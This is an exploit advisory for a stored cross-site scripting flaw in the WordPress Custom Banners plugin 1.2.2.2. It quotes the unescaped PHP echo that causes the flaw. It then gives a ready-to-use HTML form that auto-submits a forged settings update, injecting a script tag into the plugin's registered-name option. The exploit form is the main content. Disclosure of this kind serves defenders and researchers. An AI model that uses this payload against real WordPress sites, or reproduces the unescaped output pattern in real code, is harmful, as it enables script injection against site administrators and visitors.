WordPress Custom Banners plugin version 1.2.2.2 suffers from a cross site scripting vulnerability.
c1385a981071b663fed344d722eddf7f5c270733c32e580c19f7c1ec13361380
######################
# Exploit Title : Wordpress custom-banners 1.2.2.2 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/custom-banners/
# Software Link : http://downloads.wordpress.org/plugin/custom-banners.zip
# Date : 2014-06-28
# Tested on : Windows 7 / Mozilla Firefox
######################
# Vulnerable code :
<table class="form-table">
<tr valign="top">
<th scope="row"><label for="custom_banners_registered_name">Email
Address</label></th>
<td><input type="text" name="custom_banners_registered_name"
id="custom_banners_registered_name" value="<?php echo
get_option('custom_banners_registered_name'); ?>" style="width:
250px" />
<p class="description">This is the e-mail address that you used when
you registered the plugin.</p>
</td>
</tr>
</table>
######################
Exploit Code:
<html>
<body>
<form name="post_form" method="post"
action="http://localhost/wp-admin/options.php">
<input type='hidden' name='option_page'
value='custom-banners-settings-group' /><input type="hidden"
name="action" value="update" /><input type="hidden" id="_wpnonce"
name="_wpnonce" value="8fcfa93c1a" /><input type="hidden"
name="_wp_http_referer"
value="/wp-admin/admin.php?page=custom-banners%2Flib%2Fcustom_banners_options.php&settings-updated=true"
/>
<input type="hidden" name="custom_banners_registered_name"
id="custom_banners_registered_name"
value='"/><script>alert(1);</script>'/>
<script language="Javascript">
setTimeout('post_form.submit()', 1);
</script>
</form>
</body>
</html>
#####################
Discovered By : ACC3SS
#####################